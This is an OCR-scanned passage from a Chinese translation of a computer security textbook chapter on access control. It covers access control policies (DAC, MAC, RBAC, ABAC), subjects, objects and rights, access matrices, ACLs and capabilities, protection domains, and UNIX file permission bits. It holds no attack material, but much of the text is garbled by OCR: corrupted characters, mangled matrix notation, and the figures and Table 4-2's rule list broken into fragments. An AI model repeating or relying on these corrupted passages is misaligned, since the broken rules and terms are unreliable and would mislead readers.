https://www.grc.com/sqrl/sqrl.htm 上 有 相关 描述 。 就 SQRL 如 何 运作 写 一 篇 总 结 ， 并 阐明 本 章 列 举 
的 各 种 用 户 认证 类 型 在 SQRL 中 的 适用 情况 。 
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访问 控制 


学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 解释 访问 控制 是 如 何 适 用 于 包括 认证 、 授 权 和 审计 等 在 内 的 更 广泛 的 语 境 的 ; 
© 定义 三 种 主要 类 别 的 访问 控制 策略 ; 

© 区 分 主体 、 客 体 和 访问 权 ; 

o 描述 UNIX 文件 访问 控制 模型 ; 


@ 讨论 基于 角色 的 访问 控制 的 主要 概念 ; 

e 总 结 RBAC 模型 ; 

© 讨论 基于 属性 的 访问 控制 的 主要 概念 ; 

© 解释 身份 、 赁 证 和 访问 管理 模型 ; 

© 理解 身份 联合 的 概念 及 其 与 信任 框架 的 关系 。 


下 述 关 于 访问 控制 的 定义 对 于 理解 其 所 涉及 的 范围 是 非常 有 益 的 : 

1. NIST IR 7298《 信 息 安 全 关键 名 词 术 语 》 定 义 访问 控制 为 授予 或 拒绝 下 列 特定 要 求 的 过 
程 : (1) 获得 并 使 用 信息 及 相关 信息 处 理 服务 ; (2) 进入 特定 物理 设施 。 

2. RFC 4949《 Internet 安全 术语 》 定 义 访问 控制 为 这 样 一 个 过 程 .实现 依据 安全 策略 对 使 
用 系统 资源 进行 控制 ， 且 仅 许 可 授权 实体 (用户 、 程 序 、 进 程 或 其 他 系统 ) 依据 该 策略 使 用 系 
统 资源 。 

我 们 可 以 把 访问 控制 看 作 计算 机 安全 的 核心 元 素 。 计 算 机 安全 的 主要 目标 是 防止 非 授权 
用 户 获 得 对 资源 的 访问 ， 防 止 合法 用 户 以 非 授权 方式 访问 资源 ， 使 合法 用 户 以 授权 方式 访问 
资源 。 


上 面 我 们 对 一 些 相关 的 重要 概念 进行 了 概述 ， 接 着 详细 介绍 三 种 广泛 采用 的 访问 控制 策略 


的 实现 技术 ， 然 后 从 更 广阔 的 视角 审视 采用 身份 、 凭 证 和 属性 实现 访问 控制 的 总 体 管理 问题 。 
最 后 ， 介 绍 信任 框架 的 概念 。 


4.1 访问 控制 原理 


从 广义 上 来 讲 ， 所 有 的 计算 机 安全 都 与 访问 控制 有 关 。 实 际 上 ，RFC 4949 定义 计算 机 安 
全 如 下 : 用 来 实现 和 保证 计算 机 系统 的 安全 服务 的 措施 ， 特 别 是 保证 访问 控制 服务 的 措施 。 本 
章 讨 论 的 访问 控制 的 概念 更 狭义 、 更 具体 : 访问 控制 实现 的 安全 策略 是 ， 指 定 对 于 每 个 具体 的 
系统 资源 ， 谁 或 什么 (如 一 个 进程 ) 可 以 访问 ， 以 及 每 个 实例 允许 的 访问 类 型 。 


4.1.1 访问 控制 语 境 


图 4-1 显示 了 访问 控制 更 广义 的 语 境 。 除 去 访问 控制 ， 这 个 广义 的 语 境 还 涉及 下 面 的 实体 
和 功能 : 

e iAiE (authentication): 验证 用 户 或 其 他 系统 实体 声称 的 身份 是 有 效 的 。 

o 授权 (authorization): 授予 系统 实体 访问 系统 资源 的 权限 和 许可 。 这 一 功能 确定 谁 对 于 
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给 定 的 目的 是 可 信 的 。 

o 审计 (audit): 对 系统 记录 和 活动 进行 独立 评审 和 检查 ， 以 便 测试 系统 控制 措施 的 充分 
性 ， 确 保 符合 既定 的 策略 和 操作 规程 ， 检 测 安全 违规 ， 并 推荐 控制 措施 、 策 略 和 规程 
应 采取 的 相应 变化 。 
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图 4-1 访问 控制 与 其 他 安全 功能 的 关系 
来 源 : 基于 [SAND94] 


访问 控制 机 制 在 用 户 〈 或 代表 用 户 执行 的 进程 ) 与 系统 资源 (如 应 用 、 操 作 系统 、 防 火 墙 、 
路 由 器 、 文 件 和 数据 库 ) 之 间 工 作 。 系 统 必须 首先 认证 试图 访问 的 用 户 。 一 般 地 ， 认 证 功能 决 
定 用 户 是 否 被 允许 访问 整个 系统 。 进 而 ,访问 控制 功能 决定 是 否 允 许 这 个 用 户 具 体 的 访问 请 
求 。 安 全 管理 员 维护 的 授权 数据 库 指定 这 个 用 户 对 哪些 资源 的 什么 类 型 的 访问 是 被 允许 的 。 访 
问 控制 功能 查询 这 个 数据 库 ， 确 定 是 否 对 其 授予 访问 权 。 审 计 功 能 监视 并 保存 用 户 访问 系统 资 
源 的 记录 。 

在 图 4-1 的 简单 模型 中 ,访问 控制 功能 作为 一 个 单独 的 逻辑 模块 。 在 实践 中 ,许多 组 件 可 
以 共享 访问 控制 功能 。 所 有 的 操作 系统 都 至 少 有 一 个 基本 的 、 很 多 情况 下 非常 健壮 的 访问 控制 
组 件 。 附 加 的 安全 包 可 以 增强 OS 的 本 地 访问 控制 能 力 。 特 殊 的 应 用 或 实用 程序 ， 如 数据 库 管 
理 系统 ， 也 加 入 了 访问 控制 功能 。 外 部 设备 如 防火 墙 也 能 提供 访问 控制 服务 。 


4.1.2 ”访问 控制 策略 


包含 在 授权 数据 库 中 的 访问 控制 策略 用 来 指出 什么 类 型 的 访问 在 什么 情况 下 被 谁 允许 。 访 
问 控制 策略 一 般 分 成 以 下 几 类 ， 

e 自主 访问 控制 (Discretionary Access Control, DAC): 基于 请 求 者 的 身份 和 访问 规则 ( 授 
AL) 控制 访问 ， 规 定 请 求 者 可 以 (或 不 可 以 ) 做 什么 。 这 种 策略 被 称 为 “自主 的 ”是 因 
为 允许 一 个 实体 按 其 自己 的 意志 授予 男 一 个 实体 访问 某 些 资源 的 权限 。 

© 强制 访问 控制 (Mandatory Access Control, MAC): 通过 比较 具有 安全 许可 (表明 系统 
实体 有 资格 访问 某 种 资源 ) 的 安全 标记 (表明 系统 资源 的 敏感 或 关键 程度 ) 来 控制 访 
问 。 这 种 策略 被 称 为 “强制 的 ”是 因为 一 个 具有 访问 某 种 资源 的 许可 的 实体 不 能 按 其 
自己 的 意志 授予 另 一 个 实体 访问 那 种 资源 的 权限 。 

e 基于 角色 的 访问 控制 ( Role-Based Access Control, RBAC): 基于 用 户 在 系统 中 所 具有 
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的 角色 和 说 明 各 种 角色 用 户 享有 哪些 访问 权 的 规则 来 控制 访问 。 
e 基于 属性 的 访问 控制 (Attribute-Based Access Control, ABAC): 基于 用 户 、 被 访问 资源 
及 当前 环境 条 件 来 控制 访问 。 
DAC 是 实现 访问 控制 的 传统 方法 ， 我 们 将 在 4.3 节 和 4.4 节 中 对 其 进行 研究 。MAC 是 起 
源 于 军事 信息 安全 需求 的 概念 ， 在 第 13 章 讨 论 可 信 系 统 语 境 时 将 对 其 进行 详细 介绍 。RBAC 
和 ABAC 都 已 日 益 流行 ， 分 别 在 4.5 节 和 4.6 节 研 究 。 
这 四 种 策略 并 不 是 互相 排斥 的 。 一 种 访问 控制 机 制 可 以 使 用 两 种 甚至 全 部 策略 来 处 理 不 同 
类 别 的 系统 资源 。 


4.2 ” 主体、 客体 和 访问 权 


访问 控制 的 基本 元 素 是 ， 主体 、 客 体 和 访问 权 。 
£4 (subject) 是 能 够 访问 客体 的 实体 。 一 般 地 ， 主 体 的 概念 等 同 于 进程 的 概念 。 任 何 用 
户 或 应 用 实际 上 通过 代表 该 用 户 或 应 用 的 进程 来 访问 客体 。 进 程 使 用 用 户 的 属性 ， 如 访问 权 。 
主体 应 该 对 他 们 发 起 的 动作 负责 ， 可 以 用 审计 迹 (audit trail) 来 记录 主体 与 其 施加 在 客体 
上 的 关系 安全 的 动作 之 间 的 关联 。 
基本 访问 控制 系统 一 般 定义 了 三 类 主体 ， 每 类 具有 不 同 的 访问 权 : 
© 所 有 者 (owner): 可 以 是 资源 (如 文件 ) 的 创建 者 。 对 于 系统 资源 ， 所 有 权 可 以 属于 系 
统管 理 员 。 对 于 项 目 资源 ， 项 目 管理 员 或 负责 人 可 以 被 分 配 所 有 权 。 
e 组 (group): 除去 分 配给 所 有 者 的 特权 ， 命 名 组 的 用 户 也 可 以 被 授予 访问 权 ， 以 便 具有 
组 的 成 员 资格 就 具有 足够 的 访问 权 。 在 大 多 数 方案 中 ， 一 个 用 户 可 以 属于 多 个 组 。 
e 世界 (world): 被 授予 最 少 访问 权 的 用 户 ， 他 们 能 够 访问 系统 ， 但 不 包含 在 该 资源 的 属 
主 类 和 属 组 类 中 。 
客体 (object) 是 外 界 对 其 访问 受到 控制 的 资源 。 一 般 地 ， 客 体 是 一 个 用 来 包含 或 接收 信 
息 的 实体 。 实 例 包括 记录 、 块 (block)、 页 、 段 (segment)、 文 件 、 部 分 文件 (portions of files), 
目录 、 目 录 树 、 邮 箱 、 消 息 和 程序 等 。 一 些 访问 控制 系统 还 包括 比特 、 字 节 、 字 、 处 理 器 、 通 
信 端 口 、 时 钟 和 网 络 结 点 。 
被 访问 控制 系统 保护 的 客体 的 数量 和 类 型 取决 于 访问 控制 运行 的 环境 及 在 安全 性 方面 与 复 
杂 性 、 处 理 器 负载 、 易 用 性 方面 之 间 期 望 达到 的 平衡 。 
访问 权 (access right) 描述 了 主体 可 以 访问 客体 的 方式 。 可 以 包括 下 列 内 容 : 
o 读 (read): 用 户 可 以 查看 系统 资源 (如 文件 、 文 件 中 的 选 定 记 录 、 记 录 中 的 选 定 字 段 
或 者 某 种 组 合 ) 的 信息 。 读 权限 包括 复制 或 打印 的 能 力 。 
e 写 (write): 用 户 可 以 添加 、 修 改 或 删除 系统 资源 (如 文件 、 记 录 、 程 序 ) 的 数据 。 写 
权限 包括 读 权限 。 
执行 (execute): 用 户 可 以 执行 指定 的 程序 。 
删除 (delete): 用 户 可 以 删除 某 个 系统 资源 ， 如 文件 或 记录 。 
PÆ (create): 用 户 可 以 创建 新 的 文件 、 记 录 或 字段 。 
搜索 (search): 用 户 可 以 列 出 目录 中 的 文件 或 者 搜索 目录 。 


4.3 自主 访问 控制 


如 前 所 述 ， 自 主 访问 控制 方案 是 指 一 个 实体 可 以 被 授权 按 其 自己 的 意志 使 另 一 个 实体 能 
够 访问 某 些 资源 。DAC 的 一 种 通常 方式 是 在 操作 系统 或 数据 库 管 理 系 统 中 运用 的 访问 矩阵 
(access matrix)。 访 问 和 矩阵 的 概念 由 Lampson [LAMP69，LAMP71] 系统 提出 ， 随 后 由 Graham 
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与 Denning [GRAH72] Harrison 等 人 [HARR76] 细 化 。 
和 矩阵 中 的 一 维 由 试图 访问 资源 的 被 标识 的 主体 组 成 。 这 个 列表 一 般 由 用 户 或 用 户 组 组 成 ， 
尽管 除了 用 户 之 外 ， 也 可 以 控制 对 终端 、 网 络 设备 、 主 机 或 应 用 的 访问 。 另 一 维 列 出 可 以 被 访 
问 的 客体 。 在 细节 最 多 的 级 别 ， 客 体 可 以 是 一 个 数据 字段 。 更 聚集 的 分 组 如 记录 、 文 件 甚至 整 
个 数据 库 也 都 可 以 作为 矩阵 中 的 客体 。 和 矩阵 中 的 每 项 表示 一 个 特定 主体 对 一 个 特定 客体 的 访 
问 权 。 
图 4-2a 基于 [SAND94] 中 的 一 幅 图 ， 是 访问 矩阵 的 一 个 简单 例子 。 由 图 可 知 ， 用 户 A 拥 
有 文件 1 和 3 并 具有 对 这 些 文件 的 读 、 写 权限 ， 用 户 B 具有 对 文件 1 的 读 权 限 ， 依 此 类 推 。 
实践 当中 ， 访 问 和 矩阵 通常 是 稀 朴 的 ， 可 以 用 下 面 两 种 方式 之 一 分 解 。 将 矩阵 按 列 分 解 ， 产 
生 访 问 控制 表 (Access Control List，ACL)， 见 图 4-2b。 对 于 每 个 客体 ，ACL 列 出 用 户 及 其 被 
允许 的 访问 权 。ACL 可 以 包含 一 个 默认 的 (或 公有 的 ) 项 ， 使 得 没有 显 式 列 出 具有 特殊 权限 的 
用 户 拥有 一 组 默认 的 权限 。 这 组 默认 的 权限 应 该 总 是 最 小 特权 或 者 只 读 权 限 两 类 中 可 用 的 一 
类 。 列 表 的 元 素 可 以 包括 单个 用 户 ， 也 包括 用 户 组 。 
OBJECTS 
文件 2 文件 3 






文件 1 





SUBJECTS MPB | Read” 





c) a 中 文件 的 能 力 表 


b) a 中 文件 的 访问 控制 表 
图 4-2 访问 控制 结构 实例 
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因为 每 个 ACL 提供 了 一 个 指定 资源 的 信息 ， 所 以 当 想 要 确定 哪个 主体 对 某 个 资源 具有 哪 
些 访 问 权 时 ， 使 用 ACL 很 方便 。 然 而 ， 这 种 数据 结构 对 于 确定 一 个 特定 用 户 可 以 使 用 的 访问 
权 并 不 方便 。 

按 行 分 解 产 生 能 力 权证 ( capability ticket), ILAI 4-2c。 能 力 权证 用 来 指定 一 个 用 户 的 授权 
客体 和 操作 。 每 个 用 户 有 许多 权证 ， 可 以 经 系统 授权 将 其 借 给 或 转让 给 其 他 用 户 。 因 为 权证 可 
能 分 散在 系统 中 ， 所 以 产生 了 一 个 比 访问 控制 表 更 严重 的 安全 问题 ， 就 是 权证 一 定 不 可 伪造 . 
解决 这 个 问题 的 一 种 办 法 是 让 操作 系统 持 有 代表 用 户 的 所 有 权证 ， 将 这 些 权证 保存 在 用 户 不 能 
访问 的 一 块 内 存 区 域 。 另 一 种 办 法 是 在 能 力 权 证 中 包含 一 个 不 可 伪造 的 权 标 (token); 它 可 能 
是 一 串 很 长 的 随机 口令 ， 或 者 是 一 段 加 密 消息 认证 码 。 该 值 当 相 关 的 资源 被 请 求 访问 时 得 到 验 
证 。 这 种 形式 的 能 力 权 证 适用 于 内 容 安全 得 不 到 保证 的 分 布 式 环 境 。 

能 力 权 证 的 方便 与 不 方便 之 处 与 ACL 正好 相反 。 它 很 容易 确定 一 个 指定 用 户 所 拥有 的 访 
问 权 集 合 ， 但 要 确定 对 特定 资源 具有 指定 访问 权 的 用 户 列表 则 要 困难 得 多 。 

[SAND94] 提出 了 一 种 数据 结构 ， 它 不 像 访问 矩阵 那么 稀疏 ， 但 比 ACL 或 能 力 表 更 为 方便 
( 表 4-1 )。 授 权 表 中 的 一 行 对 应 于 一 个 主体 对 一 种 资源 的 一 种 访问 权 。 按 主体 排序 或 访问 该 表 等 
价 于 能 力 表 。 按 客体 排序 或 访问 该 表 等 价 于 ACL。 关 系数 据 库 很 容易 实现 这 种 类 型 的 授权 表 。 


表 4-1 4-2 中 文件 的 授权 表 
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43.1 一 个 访问 控制 模型 


本 节 介 绍 由 Lampson、Graham 和 Denning [LAMP71，GRAH72，DENN71] 开发 的 一 个 
DAC 通用 模型 。 该 模型 假定 了 一 组 主体 、 一 组 客体 以 及 一 组 控制 主体 访问 客体 的 规则 。 我 们 
把 系统 的 保护 状态 定义 为 在 一 定 的 时 间 点 指定 每 个 主体 对 每 个 客体 的 访问 权 的 信息 集 。 我 们 可 
以 识别 出 三 种 需求 : 表示 保护 状态 、 执 行 访问 权 以 及 允许 主体 以 某 些 方式 更 改 保护 状态 。 该 模 
型 给 出 了 DAC 系统 的 一 个 通用 的 逻辑 描述 ， 满 足 所 有 这 三 种 需求 。 
为 了 表示 保护 状态 ， 我 们 将 访问 控制 矩阵 中 的 客体 全 域 扩 展 到 包括 下 列 对 象 : 
o 进程 (process): 访问 权 包 括 删 除 、 中 止 (PASE) 和 唤醒 进程 的 能 力 。 
© 设备 ( device) : 访问 权 包 括 读 / 写 设备 、 控 制 设备 操作 (如 磁盘 寻 道 ) 和 封锁 /解锁 设 
备 使 用 的 能 力 。 

o 存储 单元 或 区 域 (memory location or region): 访问 权 包 括 读 / 写 存 储 区 域 的 某 些 受到 保 
护 从 而 在 默认 状态 下 不 允许 被 访问 的 单元 的 能 力 。 

o 主体 (subject): 对 主体 的 访问 权 与 授予 或 删除 该 主体 对 其 他 客体 的 访问 权 的 能 力 有 关 ， 
如 后 文 所 述 。 
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图 4-3 是 一 个 实例 。 对 于 访问 控制 矩阵 4， 其 中 的 每 一 项 4[5, x] 都 包含 被 称 为 访问 属性 的 
字符 串 ， 用 来 指定 主体 8 对 客体 不 的 访问 权 。 例 如 ， 在 图 4-3 中 ，5, 可 以 读 取 文件 成 ， 因 为 
“read” 出 现在 4[S1, Fi] 中 。 


客体 





4-3 ”扩展 的 访问 控制 矩阵 9 
从 逻辑 或 功能 的 观点 来 看 ， 分 离 的 访问 控制 模块 与 每 种 客体 类 型 相关 联 (图 4-4 )。 该 模块 
评估 主体 访问 客体 的 每 个 请 求 ， 以 确定 访问 权 是 否 存在 。 一 次 访问 尝试 将 触发 下 列 步骤 ; 
1. 主体 So 对 客体 开发 出 类 型 为 a 的 请 求 。 


系统 干预 
访问 控制 机 制 
















(S,, wakeup, P) 


vc 


grant a to SX 





4-4 访问 控制 功能 的 组 织 结构 


O 图 4-3 中 各 访问 权 的 中 文 含义 为 : control 控制 ; owner 拥有 ; read 读 ; write 写 ; execute 执行 ;wakeup 唤醒 ; 
stop 中 止 ; seek 寻 道 一 一 译 者 注 
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2. 该 请 求 导 致 系统 (操作 系统 或 某 种 类 型 的 访问 控制 接口 模块 ) 为 的 控制 器 生成 形 如 
(So, a, X) 的 消息 。 

3. 控制 器 询问 访问 矩阵 4， 以 确定 a 是否 在 ALS, X 中 。 如 果 在 ,允许 访问 ; 否则 ， 拒 绝 
访问 ,保护 违例 出 现 。 该 违例 将 触发 警告 及 适当 的 动作 。 

图 4-4 提出 主体 对 客体 的 每 次 访问 都 通过 该 客体 的 控制 器 完成 。 控 制 器 的 决定 取决 于 和 矩阵 
的 当前 内 容 。 此 外 ， 某 些 主体 具有 对 访问 矩阵 进行 特定 修改 的 权力 。 修 改 访 问 和 矩阵 的 请 求 被 看 
作对 矩阵 的 一 次 访问 ， 其 中 将 矩阵 的 单个 项 作为 客体 。 这 些 访问 通过 控制 矩阵 更 新 的 访问 矩阵 
控制 器 完成 。 

这 个 模型 还 包括 控制 修改 访问 矩阵 的 一 组 规则 ， 如 表 4-2 所 示 。 在 该 表 中 ， 我 们 引入 了 
“owner” 和 “control” 访 问 权 以 及 复制 标志 (copy flag) 的 概念 ， 下 面 会 详细 解释 这 些 内 容 。 


表 4-2 访问 控制 系统 命令 


RI “a* ”在 A[So, X] 中 将 人 } 存储 到 AIS, X 中 


R2 “owner” 在 4[Su X] 将 人 } 存 储 到 4[S 加 中 
“control” ZE 4[su X] 中 
R3 delete a from S, X z 从 4[S, X] 中 删除 a 


“owner” ZE A[So, X] 中 


oaa 在 4[So, X] P 
R4 w +— read S, X 复制 4[So X] A) w 
Ta a 中 


在 4 中 插入 X 对 应 的 列 ; 将 
“owner” 存 储 到 A[So, X] 


R6 “owner” E 中 在 A 中 删除 蕊 对 应 的 列 


在 4 中 插入 3 对 应 的 行 ， 执行 
R7 create subject S 无 create object S; 将 “control” 存 储 
到 4[S, S) F} 
在 4 中 删除 S$ 对 应 的 行 ; 执行 
E 2 iis i i destroy bject s 





R5 create | | X 


前 三 个 规则 用 来 处 理 转 授 、 授 予 和 删除 访问 权 。 假 设 项 a* FET 4[So, XA 中 。 这 意味 着 
So 对 客体 具有 访问 权 ， 并 且 由 于 复制 标志 的 存在 ， 可 以 把 这 个 访问 权 带 或 不 带 复制 标志 
转 授 给 另 一 个 主体 。 规 则 R 就 表示 这 种 能 力 。 如 果 主 体 认 为 其 转 授 访问 权 的 新 主体 将 恶意 地 
把 访问 权 转 授 给 男 一 个 不 应 该 具有 访问 权 的 主体 ， 它 可 以 不 带 复制 标志 地 转 授 访 问 权 。 例 如 ， 
Si 可 以 在 Fi 列 的 任何 矩阵 项 中 填 和 人 “read” 或 “read*”。 规 则 R2 规定 ， 如 果 S 被 指定 为 客 
TEXAS, ABA Sy 可 以 将 该 客体 的 访问 权 授 予 任何 其 他 主体 。 规 则 R2 说 明 如 果 S RA 
xt X HY “owner” GAL, ABA So 可 以 对 任何 8S， 添 加 任何 访问 权 到 ALS, X] 中。 规则 R3 允许 
So 删除 其 控制 的 主体 所 在 行 或 其 拥有 的 客体 所 在 列 中 的 任何 矩阵 项 的 任何 访问 权 。 规 则 R4 允 
许 主体 读 取 其 拥有 或 控制 的 矩阵 部 分 。 

表 4-2 中 的 其 余 规则 用 来 控制 主体 和 客体 的 创建 与 删除 。 规 则 RS 规定 任何 主体 都 能 创建 
新 的 客体 ， 继 而 拥有 该 客体 并 能 授予 、 删 除 对 其 的 访问 权 。 按 照 规则 R6， 客 体 的 所 有 者 可 以 
销毁 该 客体 ， 继 而 删除 访问 矩阵 的 相应 列 。 规 则 R7 使 得 任何 主体 能 够 创建 新 的 主体 ， 创 建 者 
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于 是 拥有 新 主体 ， 而 新 主体 可 以 控制 对 其 自身 的 访问 。 规 则 R8 Pit ERS TA ARV E 
阵 中 该 主体 对 应 的 行 和 列 (如果 有 主体 列 的 话 )。 

表 4-2 中 的 规则 集 是 为 访问 控制 系统 定义 的 规则 集 的 一 个 实例 。 下 面 是 可 以 包括 的 附加 规 
则 或 替代 规则 的 实例 。 可 以 定义 只 转 权 (transfer-only right)， 用 来 使 转 授 的 权限 添加 到 目标 主 
体 或 从 转 授 主 体 删除 。 通 过 不 允许 伴随 所 有 权 出 现 复 制 标 记 ， 可 以 将 客体 或 主体 的 所 有 者 的 数 
目 限 制 到 一 个 。 

一 个 主体 创建 另 一 个 主体 并 对 该 主体 具有 “owner” 访 问 权 的 能 力 可 以 用 来 定义 主体 层次 。 
例如 ， 在 图 4-3 P, S HWA S A S, EE S A S Z S 管理。 根据 表 4-2 中 的 规则 ，5 可 以 授 
了 予 和 删除 它 已 具有 的 对 S 的 访问 权 。 因 而 ， 一 个 主体 可 以 创建 另 一 个 权限 为 其 本 身 访 问 权 的 
子 集 的 主体 。 这 可 能 很 实用 。 例 如 ， 如 果 一 个 主体 正在 调用 一 个 并 不 完全 可 信 的 应 用 ， 那 它 就 
不 想 让 该 应 用 能 给 其 他 主体 转 授 访问 权 。 


4.3.2 ”保护 域 


我 们 到 有 目前 为 止 讨论 的 访问 控制 矩阵 模型 是 把 一 组 能 力 和 用 户 关联 起 来 。[LLAMP71] 提出 
了 一 种 更 一 般 、 更 灵活 的 方法 ， 就 是 把 能 力 和 保护 域 关联 起 来 。 保 护 域 (protection domain) 是 
一 组 客体 及 对 这 些 客体 的 访问 权 。 根 据 访问 矩阵 的 规定 ， 一 行 定义 一 个 保护 域 。 迄 今 为 止 , 我 
们 都 把 每 一 行 等 同 于 一 个 特定 用 户 。 因 此 ， 在 这 个 受 限 模 型 中 ， 每 个 用 户 具有 一 个 保护 域 ， 并 
且 该 用 户 创建 的 任何 进程 都 具有 同一 保护 域 定义 的 访问 权 。 

保护 域 这 个 更 一 般 的 概念 用 来 提供 更 多 的 灵活 性 。 例 如 ， 用 户 可 以 通过 定义 一 个 新 的 保护 
域 来 创建 权限 为 其 访问 权 子 集 的 进程 。 这 就 限制 了 进程 的 能 力 。 服 务 器 进程 可 以 使 用 这 一 方案 
来 为 不 同类 别 的 用 户 创建 进程 。 而 且 ， 用 户 也 可 以 为 不 能 完全 信任 的 程序 定义 一 个 保护 域 ， 以 
便 将 该 程序 的 访问 限制 在 用 户 访问 权 的 一 个 安全 子 集中 。 

进程 与 保护 域 之 间 的 关联 可 以 是 静态 的 ， 也 可 以 是 动态 的 。 例 如 进程 可 以 执行 一 个 过 程序 
列 ， 对 其 中 每 个 过 程 要 求 不 同 的 访问 权 。 一 般 地 ， 我 们 愿意 最 小 化 任何 用 户 或 进程 在 任何 一 次 
访问 中 的 访问 权 。 保 护 域 的 使 用 为 满足 这 个 要 求 提供 了 一 种 简单 的 方式 。 

保护 域 的 一 种 形式 与 很 多 操作 系统 (如 UNIX) 的 用 户 与 内 核 模式 的 区 别 有 关 。 用 户 程 序 
运行 于 用 户 模式 (user mode)， 不 能 使 用 某 些 受 保护 的 内 存 区 域 ， 且 不 能 执行 某 些 指令 。 当 用 
户 进程 调用 系统 例 程 时 ， 那 个 例 程 运行 于 系统 模式 ， 或 者 叫 内 核 模 式 〈kerel mode)， 其 能 够 
执行 特权 指令 ， 并 能 访问 受 保 护 的 内 存 区 域 。 


44 实例 : UNIX 文件 访问 控制 


为 了 讨论 UNIX 文件 访问 控制 ， 需 要 介绍 一 些 关 于 UNIX 文件 和 目录 的 基本 概念 。 

所 有 类 型 的 UNIX 文件 都 由 操作 系统 通过 inode 管理 。inode (index node， 索 引 结 点 ) 是 包 
含 操作 系统 对 一 个 文件 所 需 的 关键 信息 的 控制 结构 。 几 个 文件 名 可 以 与 一 个 inode 关联 ， 但 一 
个 活动 inode 仅 与 一 个 文件 关联 ， 一 个 文件 也 仅 被 一 个 inode 控制 。 文 件 的 属性 及 访问 许可 和 
其 他 控制 信息 都 存储 在 inode 中 。 在 磁盘 上 有 个 inode 表 ， 其 中 包含 了 文件 系统 中 所 有 文件 的 
inode。 打 开 一 个 文件 时 ， 它 的 inode 被 读 进 主 存 ， 存 储 在 驻 留 内 存 的 inode 表 中 。 

目录 呈 分 层 树 状 结构 。 每 个 目录 包含 文件 或 其 他 目录 。 包 含 在 另 一 个 目录 中 的 目录 被 称 为 
子 目录 。 目 录 仅 仅 是 一 个 包含 文件 名 和 指向 关联 inode 的 指针 的 列表 。 因 而 ， 每 个 目录 都 与 其 
自己 的 inode 关联 。 


4.4.1 传统 的 UNIX 文件 访问 控制 
大 多 数 UNIX 系统 都 依赖 于 或 者 至 少 是 基于 UNIX 早期 版 本 引入 的 文件 访问 控制 方案 。 每 
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个 UNIX 文件 被 分 配 一 个 唯一 的 用 户 标识 号 (user identification number, user ID)。 用 户 是 主 
组 的 成 员 ， 还 可 能 是 其 他 许多 用 组 ID 标识 的 组 的 成 员 。 创 建文 件 时 ， 指 定 一 个 用 户 拥有 该 文 
件 ， 并 用 该 用 户 的 ID 标识 这 个 文件 。 文 件 还 属于 一 个 特定 组 ， 组 的 初 值 是 文件 创建 者 的 主 组 
或 其 父 目录 的 属 组 ( 当 SetGID 许可 置 位 时 )。 与 每 个 文件 相关 联 的 是 12 个 保护 位 的 组 合 。 属 
主 ID、 属 组 ID 和 保护 位 都 是 文件 inode 的 一 部 分 。 

9 个 保护 位 分 别 用 来 指定 文件 属 主 、 同 组 用 户 与 其 他 用 户 的 读 、 写 和 执行 许可 。 这 就 形成 
了 所 有 者 、 同 组 用 户 和 其 他 用 户 的 层次 结构 ， 且 使 用 其 中 最 相关 的 许可 集 。 图 4-5a 给 出 了 
一 个 例子 ， 其 中 文件 属 主 具 有 读 和 写 权 限 ， 同 组 用 户 具 有 读 权 限 ， 其 他 用 户 没 有 任何 访 
问 权 。 保护 位 应 用 到 目录 时 ， 读 、 写 位 分 别 用 来 授予 列表 和 创建 / 重 命名 / 删除 文件 的 权 
限 9 ， 执 行 位 用 来 授予 进入 目录 或 在 目录 中 搜索 文件 名 的 权限 。 

MEX MAX 其 他 类 


有 


a) 传统 的 UNIX 方 法 〈 最 小 访问 控制 列表 ) 
REX MAK ”其 他 类 


rw- rw- 
user: :rw- 
user: joe:rw- 
aen] 
group: :r-- 
mask: :rw- 
other: :--- 
b) 扩展 的 访问 控制 列表 


图 4-5 ”UNIX 文件 访问 控制 


剩余 的 3 个 位 定义 了 文件 或 目录 的 其 他 特殊 行为 。 其 中 两 个 是 “设置 用 户 ID ” (SetUID ) 
和 “设置 组 ID”( SetGID) 许可 。 如 果 对 一 个 可 执行 文件 设置 这 些 位 ， 操 作 系统 会 按 下 面 方式 
运行 。 当 用 户 〈 具 有 该 文件 的 执行 权 ) 执行 该 文件 时 ， 系 统 会 临时 把 文件 创建 者 的 用 户 ID 或 
文件 属 组 的 权限 分 配给 执行 该 文件 的 用 户 。 这 些 被 认为 是 在 对 程序 制定 访问 控制 决策 ， 此 时 ， 
执行 程序 的 用 户 除了 “真实 的 用 户 ID” 和 “真实 的 组 ID” 之 外 使 用 “有 效 的 用 户 ”和 “有 
效 的 组 ID”。 这 个 改变 仅 当 程序 运行 时 有 效 。 该 特征 使 我 们 能 够 创建 和 使 用 正常 情况 下 能 访问 
其 他 用 户 不 能 访问 的 文件 的 特权 程序 ， 还 能 使 用 户 能 在 受 控 方式 下 访问 某 些 文件 。 另 外 ， 当 这 
两 个 许可 位 应 用 到 目录 时 ，SetGID 许可 表示 新 创建 的 文件 将 继承 该 目录 的 属 组 ，SetUID 许可 
被 忽略 。 

BMF R” (sticky) 位 。 当 对 文件 设置 该 位 时 ， 最 初 表示 系统 应 在 文件 执行 后 
将 其 内 容 保留 在 内 存 中 ， 现 在 已 不 使 用 。 然 而 当 该 位 应 用 到 目录 时 ， 则 指出 只 有 该 目录 中 任何 
文件 的 属 主 才 可 以 重 命名 、 移 动 或 删除 那个 文件 。 这 对 管理 共享 的 临时 目录 中 的 文件 十 分 有 用 。 


O 注意 ,目录 的 权限 与 该 目录 包含 的 任何 文件 或 子 目录 的 权限 是 不 同 的 。 用 户 对 目录 具有 写 权限 并 不 意味 着 
他 对 目录 中 的 文件 具有 写 权限 。 这 是 由 特定 文件 的 权限 控制 的 。 然 而 ， 该 用 户 具有 重 命名 文件 的 权限 。 
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有 一 个 特殊 的 用 户 ID 被 指定 为 “超级 用 户 ”。 超 级 用 户 不 受 通 常 的 文件 访问 控制 限制 ， 
具有 系统 范围 的 访问 权 。 任 何 被 超级 用 户 拥 有 (或 设置 SetUID 到 超级 用 户 ) 的 程序 实际 上 对 
执行 该 程序 的 任何 用 户 授 予 了 无 限制 的 访问 权 。 因 此 在 编写 这 样 的 程序 时 一 定 要 非常 小 心 。 

当 文 件 访 问 需 求 与 用 户 和 中 等 数目 的 用 户 组 联系 在 一 起 时 ， 这 种 访问 机 制 是 足够 的 。 例 
如 ,假设 一 个 用 户 想 给 用 户 A 和 B 授予 对 文件 X MER, AAP B 和 C 授予 对 文件 Y 的 
读 权限 。 我 们 至 少 需 要 两 个 用 户 组 。 用 户 B 为 了 访问 两 个 文件 需要 同时 属于 这 两 个 组 。 然 而 ， 
